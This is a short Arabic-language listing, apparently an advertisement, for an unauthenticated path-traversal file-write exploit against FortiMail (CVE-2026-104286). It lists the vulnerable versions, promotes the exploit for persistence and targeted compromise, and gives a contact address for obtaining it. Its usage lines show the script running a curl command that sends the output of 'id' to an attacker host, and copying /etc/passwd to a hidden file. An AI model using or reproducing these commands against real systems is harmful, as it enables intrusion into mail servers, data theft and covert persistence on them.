
استغلال اجتياز المسار غير الموثق لـ CVE-2026-104286 في FortiMail، وكتابة ملفات عشوائية عبر طلبات HTTP/HTTPS مُصمَّمة لتقييم الفريق الأحمر وتحقيق الاستمرارية.
استغلال متقدم عن بُعد بدون مصادقة لكتابة ملفات عشوائية في FortiMail عبر CVE-2026-104286. تتجاوز طلبات HTTP/HTTPS المُصممة بعناية تنقية المسار في عميل الويب، مما يتيح إنشاء ملفات عشوائية على نظام التشغيل الأساسي. يُستخدم لتقييم الفريق الأحمر، وزرع الاستمرارية، والاختراق المُوجَّه لنشر FortiMail.
FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)
تقييد غير صحيح لاسم المسار إلى دليل محظور (CWE-22). لا يوجد تحقق من تسلسلات ../ في مسارات رفع الملفات داخل معالجات واجهة برمجة تطبيقات HTTP/HTTPS، مما يسمح بالاجتياز خارج دليل الرفع المقصود.
$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
للتواصل بخصوص الاستغلال: [email protected]